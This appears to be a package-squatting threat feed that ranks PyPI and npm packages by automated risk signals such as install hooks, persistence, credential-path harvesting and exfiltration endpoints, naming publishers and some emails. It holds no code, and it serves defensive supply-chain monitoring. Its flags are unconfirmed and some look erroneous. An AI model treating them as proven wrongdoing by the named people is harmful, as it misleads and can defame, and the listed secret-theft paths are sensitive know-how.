Automated package-squatting & slopsquatting detection signals across PyPI and npm — these are automated, unconfirmed signals. Use them to find candidates to investigate, but don't automatically assume they're malicious.

Sorted by risk score. Cleared packages hidden by default — add verdict:benign_community to include. Packages the registry has since removed are hidden too — see them on the Taken Down tab or add state:taken_down. Very risky packages require manual human audit. • Tag & Signal Legend →

Search & filter syntax reference
Filter with verdict: (malicious, suspicious, unverified_high_signal, squatted_stub…), ecosystem: (pypi/npm), hook: (install, network, pth, gyp, worm, c2, creds, binary, env, stealer, any — malicious hooks & behaviors), email:, domain:, keyword:, version: (comma = OR within a field, space = AND across fields), age:<6h / age:>90d (combine both for a range), state:live / state:taken_down (registry liveness — the feed defaults to state:live), lead:>7d (days we had a since-removed package flagged while it was still up), or a bare word for a package-name search.
Package Score ▼ Age Users Lines Growth Verdict Targeted Ecosystem Version Author Email domain Signals
360 23d 125 1,509 ↑5.4/day
Very Risky
vpspilot pypi 1.0.0 Technology Innovision Team — 🪝
Package purpose: VPSPilot: The Autonomous Next-Gen VPS Command Center & Online Management Dashboard
Claimed homepage: https://pypi.org/project/vpspilot/
Matched naming pattern: python-vpspilot-core
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 23
Registry downloads: 125/month, 6/week (MODERATE_USAGE)
Codebase size: 1509 lines, 61.6 kB across 12 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage published 5+ versions in rapid succession (< 24h) to mimic mature open source maintenance.
  • HIGHPackage registered recently (20 days ago) during the active AI hallucination slopsquatting wave.
  • CRITICALINSTALL_TIME_CMDCLASS_OVERRIDE: 'CustomInstallCommand.run()' executes 'subprocess.run' during installation in vpspilot-1.0.0/setup.py:38
  • CRITICALINSTALL_TIME_CMDCLASS_OVERRIDE: 'CustomInstallCommand.run()' executes 'subprocess.run' during installation in vpspilot-1.0.0/setup.py:39
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in vpspilot-1.0.0/setup.py:38
  • HIGHINSTALL_TIME_EXECUTION: 'Python setup.py Custom Install Hook' found in vpspilot-1.0.0/setup.py:8
  • HIGHSYSTEM_PERSISTENCE_TAMPERING: 'Systemd / macOS LaunchAgent Persistence' found in vpspilot-1.0.0/setup.py:35
  • HIGHSUPPLY_CHAIN_EXECUTION_HOOK: 'PyPI Custom Install Class Override' found in vpspilot-1.0.0/setup.py:8
Static code signals:
  • INSTALL_TIME_CMDCLASS_OVERRIDE: 'CustomInstallCommand.run()' executes 'subprocess.run' during installation in vpspilot-1.0.0/setup.py:38
  • INSTALL_TIME_CMDCLASS_OVERRIDE: 'CustomInstallCommand.run()' executes 'subprocess.run' during installation in vpspilot-1.0.0/setup.py:39
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in vpspilot-1.0.0/setup.py:38
  • INSTALL_TIME_EXECUTION: 'Python setup.py Custom Install Hook' found in vpspilot-1.0.0/setup.py:8
  • SYSTEM_PERSISTENCE_TAMPERING: 'Systemd / macOS LaunchAgent Persistence' found in vpspilot-1.0.0/setup.py:35
  • SUPPLY_CHAIN_EXECUTION_HOOK: 'PyPI Custom Install Class Override' found in vpspilot-1.0.0/setup.py:8
  • SOURCE_CODE_PERSISTENT_BACKDOOR: persistence mechanism combined with execution/network in vpspilot-1.0.0/setup.py
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in vpspilot-1.0.0/vpspilot/cli.py:84

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
340 166d 20 19,232 ↑0.1/day
🚨 Possible Stealer Very Risky
talisman pypi 1.1.0 MR MARCUS TAYK — 🪝
Package purpose: TALISMAN — Threat Analysis, Lateral Intelligence & Security Management for Advanced Networks
Claimed homepage: https://pypi.org/project/talisman-recon/
Matched naming pattern: python-talisman-recon
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 166
Registry downloads: 20/month, 9/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 19232 lines, 865.0 kB across 129 files (LARGE_CODEBASE)
Automated signals flagged:
  • HIGHPackage registered recently (138 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in talisman_recon-1.1.0/talisman/ai/engine.py:43
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in talisman_recon-1.1.0/talisman/cli.py:137
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in talisman_recon-1.1.0/talisman/engine/plugin_manager.py:210
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in talisman_recon-1.1.0/talisman/modules/activedirectory/kerberos.py:20
  • HIGHANTI_ANALYSIS_EVASION: 'TLS / SSL Verification Bypass (Defense Evasion)' found in talisman_recon-1.1.0/talisman/modules/api/grpc.py:35
  • HIGHSUSPICIOUS_OBFUSCATION: 'Dense Hex Escape Sequences' found in talisman_recon-1.1.0/talisman/modules/api/grpc.py:19
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in talisman_recon-1.1.0/talisman/modules/api/oauth.py:31
Static code signals:
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in talisman_recon-1.1.0/talisman/ai/engine.py:43
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in talisman_recon-1.1.0/talisman/cli.py:137
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in talisman_recon-1.1.0/talisman/engine/plugin_manager.py:210
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in talisman_recon-1.1.0/talisman/modules/activedirectory/kerberos.py:20
  • ANTI_ANALYSIS_EVASION: 'TLS / SSL Verification Bypass (Defense Evasion)' found in talisman_recon-1.1.0/talisman/modules/api/grpc.py:35
  • SUSPICIOUS_OBFUSCATION: 'Dense Hex Escape Sequences' found in talisman_recon-1.1.0/talisman/modules/api/grpc.py:19
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in talisman_recon-1.1.0/talisman/modules/api/oauth.py:31
  • CREDENTIAL_PATH_HARVESTING: 'Cloud Instance Metadata (AWS/GCP/Azure IMDS)' found in talisman_recon-1.1.0/talisman/modules/cloud/aws.py:39

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
315 117d 11 3,903 ↑0.1/day
Very Risky
azure pypi 1.0.0 Cisco Systems Inc. c8kv-cloud-dev@cisco.com cisco.com 🪝
Package purpose: Utilities for c8kv on Azure
Claimed homepage: https://github4-chn.cisco.com/csr1000v-azure/c8kv_azure_utils
Matched naming pattern: django-azure-auth
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 117
Registry downloads: 11/month, 1/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 3903 lines, 193.4 kB across 24 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'c8kv-azure-utils' matches AI hallucination template [django] + [azure] + [auth].
  • HIGHClaims critical enterprise brand identity ('AZURE').
  • HIGHPublisher email 'c8kv-cloud-dev@cisco.com' is not affiliated with official vendor domain.
  • MEDIUMPackage has empty or near-zero description (potential reservation stub).
  • HIGHPackage registered recently (89 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in c8kv_azure_utils-1.0.0/c8kv_cloud/as_azure.py:39
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in c8kv_azure_utils-1.0.0/c8kv_cloud/auth_mgr.py:69
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in c8kv_azure_utils-1.0.0/c8kv_cloud/eventhub_utils.py:26
Static code signals:
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in c8kv_azure_utils-1.0.0/c8kv_cloud/as_azure.py:39
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in c8kv_azure_utils-1.0.0/c8kv_cloud/auth_mgr.py:69
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in c8kv_azure_utils-1.0.0/c8kv_cloud/eventhub_utils.py:26
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in c8kv_azure_utils-1.0.0/c8kv_cloud/ha_azure.py:31
  • CREDENTIAL_PATH_HARVESTING: 'Cloud Instance Metadata (AWS/GCP/Azure IMDS)' found in c8kv_azure_utils-1.0.0/c8kv_cloud/meta_utils.py:12
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in c8kv_azure_utils-1.0.0/c8kv_cloud/metric_utils.py:31
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Sensitive Token Harvesting' found in c8kv_azure_utils-1.0.0/c8kv_cloud/metric_utils.py:31
  • CREDENTIAL_PATH_HARVESTING: 'Cloud Instance Metadata (AWS/GCP/Azure IMDS)' found in c8kv_azure_utils-1.0.0/c8kv_cloud/msi_auth.py:44

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
265 115d 468 1,254 ↑4.1/day
Very Risky
claude npm 1.2.3 — — 🪝
Package purpose: Track Claude Code token usage across your team
Matched naming pattern: claude-claude-tracker
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 115
Registry downloads: 468/month, 117/week (MODERATE_USAGE)
Codebase size: 1254 lines, 49.9 kB across 8 files (LARGE_CODEBASE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • HIGHPackage registered recently (87 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'node ./bin/postinstall.js'
  • HIGHMISSING_SOURCE_REPOSITORY_URL
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'require('child_process')' found in package/bin/claude-tracker.js:18 (+6 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/bin/claude-tracker.js:109 (+6 more occurrence(s) elsewhere)
  • HIGHSYSTEM_PERSISTENCE_TAMPERING: 'System Persistence Implant (systemd/cron/registry)' found in package/bin/claude-tracker.js:121 (+1 more occurrence(s) elsewhere)
Static code signals:
  • LIFECYCLE_SCRIPT: 'postinstall' -> 'node ./bin/postinstall.js'
  • MISSING_SOURCE_REPOSITORY_URL
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'require('child_process')' found in package/bin/claude-tracker.js:18 (+6 more occurrence(s) elsewhere)
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/bin/claude-tracker.js:109 (+6 more occurrence(s) elsewhere)
  • SYSTEM_PERSISTENCE_TAMPERING: 'System Persistence Implant (systemd/cron/registry)' found in package/bin/claude-tracker.js:121 (+1 more occurrence(s) elsewhere)
  • SOURCE_CODE_PERSISTENT_BACKDOOR: persistence mechanism combined with execution/network in package/bin/claude-tracker.js (+1 more occurrence(s) elsewhere)
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/lib/poller.js:20 (+2 more occurrence(s) elsewhere)
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/lib/poller.js:64 (+3 more occurrence(s) elsewhere)

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on npm →
260 13d 0 19,685 ↑0.0/day
Very Risky
bug pypi 6.0.2 AwareXone — 🪝
Package purpose: AI-powered bug bounty hunting — recon to report, in your terminal.
Claimed homepage: https://pypi.org/project/agentic-bug-hunter/
Matched naming pattern: agentic-bug-hunter
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 13
Registry downloads: 0/month, 0/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 19685 lines, 955.5 kB across 69 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage published 5+ versions in rapid succession (< 24h) to mimic mature open source maintenance.
  • HIGHPackage registered recently (10 days ago) during the active AI hallucination slopsquatting wave.
  • MEDIUMPackage registered with suspiciously high major version (v6.0.2, major 6) despite recent registration (10 days ago, 3 release(s)), indicating potential dependency confusion attack to shadow internal organization builds.
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in agentic_bug_hunter-6.0.2/bughunter/agent.py:1292
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'eval()' found in agentic_bug_hunter-6.0.2/bughunter/brain.py:1788
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in agentic_bug_hunter-6.0.2/bughunter/brain.py:100
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in agentic_bug_hunter-6.0.2/bughunter/engine.py:233
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in agentic_bug_hunter-6.0.2/bughunter/engine.py:69
Static code signals:
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in agentic_bug_hunter-6.0.2/bughunter/agent.py:1292
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'eval()' found in agentic_bug_hunter-6.0.2/bughunter/brain.py:1788
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in agentic_bug_hunter-6.0.2/bughunter/brain.py:100
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in agentic_bug_hunter-6.0.2/bughunter/engine.py:233
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in agentic_bug_hunter-6.0.2/bughunter/engine.py:69
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in agentic_bug_hunter-6.0.2/bughunter/mcp/bughunter-mcp/adapters.py:45
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in agentic_bug_hunter-6.0.2/bughunter/mcp/bughunter-mcp/adapters.py:42
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in agentic_bug_hunter-6.0.2/bughunter/mcp/bughunter-mcp/cli.py:63

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
260 117d 27 102,049 ↑0.2/day
Very Risky
tether pypi 0.12.0 FastCrest — 🪝
Package purpose: FastCrest Tether — edge-to-cloud robotics + edge AI deploy CLI. Optimize, deploy, verify any VLA across Jetson, RTX, Apple Silicon, AMD. Standalone or wired to FastCrest Cloud.
Claimed homepage: https://pypi.org/project/fastcrest-tether/
Matched naming pattern: python-tether-fastcrest
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 117
Registry downloads: 27/month, 2/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 102049 lines, 4.9 MB across 498 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'fastcrest-tether' matches AI hallucination template [python] + [tether] + [fastcrest].
  • HIGHClaims critical enterprise brand identity ('TETHER').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • HIGHPackage registered recently (89 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in fastcrest_tether-0.12.0/archive/scripts/modal_libero10.py:142
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in fastcrest_tether-0.12.0/archive/scripts/modal_libero10.py:119
  • CRITICALMODULE_TOPLEVEL_EXECUTION: 'subprocess.run' executed at module scope (runs on import) in fastcrest_tether-0.12.0/archive/scripts/patch_libero.py:50
  • CRITICALMODULE_TOPLEVEL_EXECUTION: 'subprocess.run' executed at module scope (runs on import) in fastcrest_tether-0.12.0/archive/scripts/patch_libero.py:51
Static code signals:
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in fastcrest_tether-0.12.0/archive/scripts/modal_libero10.py:142
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in fastcrest_tether-0.12.0/archive/scripts/modal_libero10.py:119
  • MODULE_TOPLEVEL_EXECUTION: 'subprocess.run' executed at module scope (runs on import) in fastcrest_tether-0.12.0/archive/scripts/patch_libero.py:50
  • MODULE_TOPLEVEL_EXECUTION: 'subprocess.run' executed at module scope (runs on import) in fastcrest_tether-0.12.0/archive/scripts/patch_libero.py:51
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in fastcrest_tether-0.12.0/archive/scripts/patch_libero.py:50
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'eval()' found in fastcrest_tether-0.12.0/scripts/export_pi0_monolithic.py:155
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'eval()' found in fastcrest_tether-0.12.0/scripts/local_expert_diff.py:15
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'eval()' found in fastcrest_tether-0.12.0/scripts/local_full_diff.py:36

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
260 154d 18 4,285 ↑0.1/day
Very Risky
claude pypi 0.2.0 claude-oneclick contributors — 🪝
Package purpose: VPN-style one-click toggle to route Claude Code (CLI + VSCode) to custom model endpoints (DeepSeek, NVIDIA NIMs, OpenRouter, Ollama, ...).
Claimed homepage: https://pypi.org/project/claude-oneclick/
Matched naming pattern: python-claude-oneclick
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 154
Registry downloads: 18/month, 6/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 4285 lines, 194.9 kB across 20 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'claude-oneclick' matches AI hallucination template [python] + [claude] + [oneclick].
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • HIGHPackage registered recently (126 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_oneclick-0.2.0/claude_oneclick/autostart.py:117
  • HIGHSYSTEM_PERSISTENCE_TAMPERING: 'Systemd / macOS LaunchAgent Persistence' found in claude_oneclick-0.2.0/claude_oneclick/autostart.py:9
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_oneclick-0.2.0/claude_oneclick/cli.py:332
  • HIGHCREDENTIAL_PATH_HARVESTING: 'IDE / AI Agent Configuration Hijacking' found in claude_oneclick-0.2.0/claude_oneclick/desktop.py:57
Static code signals:
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_oneclick-0.2.0/claude_oneclick/autostart.py:117
  • SYSTEM_PERSISTENCE_TAMPERING: 'Systemd / macOS LaunchAgent Persistence' found in claude_oneclick-0.2.0/claude_oneclick/autostart.py:9
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_oneclick-0.2.0/claude_oneclick/cli.py:332
  • CREDENTIAL_PATH_HARVESTING: 'IDE / AI Agent Configuration Hijacking' found in claude_oneclick-0.2.0/claude_oneclick/desktop.py:57
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_oneclick-0.2.0/claude_oneclick/desktop.py:78
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_oneclick-0.2.0/claude_oneclick/diagnose.py:144
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_oneclick-0.2.0/claude_oneclick/diagnose.py:220
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_oneclick-0.2.0/claude_oneclick/launcher.py:66

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
255 109d 18 311 ↑0.2/day
🚨 Possible Stealer Very Risky
vllm pypi 1.0.2 — aravindhvignesh58@gmail.com gmail.com 🪝 📡
Package purpose: The official library for vLLM client network and preflight validation engine.
Claimed homepage: https://pypi.org/project/open-vllm/
Matched naming pattern: python-vllm-open
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 109
Registry downloads: 18/month, 4/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 311 lines, 17.1 kB across 7 files (MODERATE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'open-vllm' matches AI hallucination template [python] + [vllm] + [open].
  • HIGHClaims critical enterprise brand identity ('VLLM').
  • HIGHPublisher email 'aravindhvignesh58@gmail.com' is not affiliated with official vendor domain.
  • HIGHPackage registered recently (81 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHEXFILTRATION_DESTINATION_DETECTED: 'Raw Public IP Endpoint' found in open_vllm-1.0.2/src/vllm_resilience_sdk/clients.py:64
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in open_vllm-1.0.2/src/vllm_resilience_sdk/clients.py:52
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Sensitive Token Harvesting' found in open_vllm-1.0.2/src/vllm_resilience_sdk/clients.py:53
  • CRITICALSOURCE_CODE_POTENTIAL_STEALER: potential exfiltration endpoint combined with credential/environment harvesting in open_vllm-1.0.2/src/vllm_resilience_sdk/clients.py
Static code signals:
  • EXFILTRATION_DESTINATION_DETECTED: 'Raw Public IP Endpoint' found in open_vllm-1.0.2/src/vllm_resilience_sdk/clients.py:64
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in open_vllm-1.0.2/src/vllm_resilience_sdk/clients.py:52
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Sensitive Token Harvesting' found in open_vllm-1.0.2/src/vllm_resilience_sdk/clients.py:53
  • SOURCE_CODE_POTENTIAL_STEALER: potential exfiltration endpoint combined with credential/environment harvesting in open_vllm-1.0.2/src/vllm_resilience_sdk/clients.py

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
255 210d 159 14,528 ↑0.8/day
Very Risky
claude npm 1.0.9 — — 🪝
Package purpose: 双端共享 Claude CLI 工具
Claimed homepage: https://github.com/yyzybb537/remote_claude#readme
Matched naming pattern: node-claude-remote
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 210
Registry downloads: 159/month, 39/week (MODERATE_USAGE)
Codebase size: 14528 lines, 581.1 kB across 49 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'remote-claude' matches AI hallucination template [node] + [claude] + [remote].
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • MEDIUMPackage has empty or near-zero description (potential reservation stub).
  • MEDIUMPackage registered 182 days ago within the 1-year AI tool proliferation window.
  • HIGHLIFECYCLE_SCRIPT: 'preinstall' -> 'bash scripts/preinstall.sh'
  • CRITICALSUSPICIOUS_SHELL_COMMAND: Pattern 'bash' in 'preinstall' script
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'bash scripts/postinstall.sh'
Static code signals:
  • LIFECYCLE_SCRIPT: 'preinstall' -> 'bash scripts/preinstall.sh'
  • SUSPICIOUS_SHELL_COMMAND: Pattern 'bash' in 'preinstall' script
  • LIFECYCLE_SCRIPT: 'postinstall' -> 'bash scripts/postinstall.sh'
  • SUSPICIOUS_SHELL_COMMAND: Pattern 'bash' in 'postinstall' script

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on npm →
255 224d 248 37,296 ↑1.1/day
Very Risky
phantom pypi 0.9.218 Usta0x001 r_gadouri@estin.dz estin.dz 🪝
Package purpose: Autonomous Offensive Security Intelligence - AI-powered penetration testing
Claimed homepage: https://pypi.org/project/phantom-agent/
Matched naming pattern: python-phantom-agent
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 224
Registry downloads: 248/month, 10/week (MODERATE_USAGE)
Codebase size: 37296 lines, 1.7 MB across 151 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'phantom-agent' matches AI hallucination template [python] + [phantom] + [agent].
  • HIGHClaims critical enterprise brand identity ('PHANTOM').
  • HIGHPublisher email 'r_gadouri@estin.dz' is not affiliated with official vendor domain.
  • MEDIUMPackage registered 196 days ago within the 1-year AI tool proliferation window.
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in phantom_agent-0.9.218/phantom/agents/base_agent.py:778
  • HIGHCREDENTIAL_PATH_HARVESTING: 'System Credentials (/etc/shadow, /etc/passwd)' found in phantom_agent-0.9.218/phantom/checkpoint/checkpoint.py:95
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in phantom_agent-0.9.218/phantom/checkpoint/checkpoint.py:51
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in phantom_agent-0.9.218/phantom/config/config.py:308
Static code signals:
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in phantom_agent-0.9.218/phantom/agents/base_agent.py:778
  • CREDENTIAL_PATH_HARVESTING: 'System Credentials (/etc/shadow, /etc/passwd)' found in phantom_agent-0.9.218/phantom/checkpoint/checkpoint.py:95
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in phantom_agent-0.9.218/phantom/checkpoint/checkpoint.py:51
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in phantom_agent-0.9.218/phantom/config/config.py:308
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in phantom_agent-0.9.218/phantom/config/secrets.py:91
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in phantom_agent-0.9.218/phantom/interface/cli_app.py:1547
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in phantom_agent-0.9.218/phantom/interface/cli_app.py:23
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in phantom_agent-0.9.218/phantom/interface/utils.py:813

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
245 122d 10 4,212 ↑0.1/day
Very Risky
aws pypi 0.1.2 — — 🪝
Package purpose: Multi AWS tool for managing operations across multiple AWS accounts via SSO
Claimed homepage: https://pypi.org/project/multi-aws-tool/
Matched naming pattern: multi-aws-tool
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 122
Registry downloads: 10/month, 0/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 4212 lines, 217.4 kB across 21 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'multi-aws-tool' matches AI hallucination template [multi] + [aws] + [tool].
  • HIGHClaims critical enterprise brand identity ('AWS').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • HIGHPackage registered recently (110 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in multi_aws_tool-0.1.2/multi_aws_tool/aws/sso_client.py:268
  • HIGHCREDENTIAL_PATH_HARVESTING: 'AWS Credentials (~/.aws/credentials)' found in multi_aws_tool-0.1.2/multi_aws_tool/cli/commands.py:360
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'eval()' found in multi_aws_tool-0.1.2/multi_aws_tool/cli/commands.py:1828
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in multi_aws_tool-0.1.2/multi_aws_tool/cli/commands.py:1263
Static code signals:
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in multi_aws_tool-0.1.2/multi_aws_tool/aws/sso_client.py:268
  • CREDENTIAL_PATH_HARVESTING: 'AWS Credentials (~/.aws/credentials)' found in multi_aws_tool-0.1.2/multi_aws_tool/cli/commands.py:360
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'eval()' found in multi_aws_tool-0.1.2/multi_aws_tool/cli/commands.py:1828
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in multi_aws_tool-0.1.2/multi_aws_tool/cli/commands.py:1263
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in multi_aws_tool-0.1.2/multi_aws_tool/cli/commands.py:1813
  • SYSTEM_PERSISTENCE_TAMPERING: 'Shell Profile Backdoor Injection' found in multi_aws_tool-0.1.2/multi_aws_tool/cli/commands.py:1832
  • SOURCE_CODE_PERSISTENT_BACKDOOR: persistence mechanism combined with execution/network in multi_aws_tool-0.1.2/multi_aws_tool/cli/commands.py
  • CREDENTIAL_PATH_HARVESTING: 'AWS Credentials (~/.aws/credentials)' found in multi_aws_tool-0.1.2/multi_aws_tool/config/schema.py:47

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
235 8d 0 32 ↑0.0/day
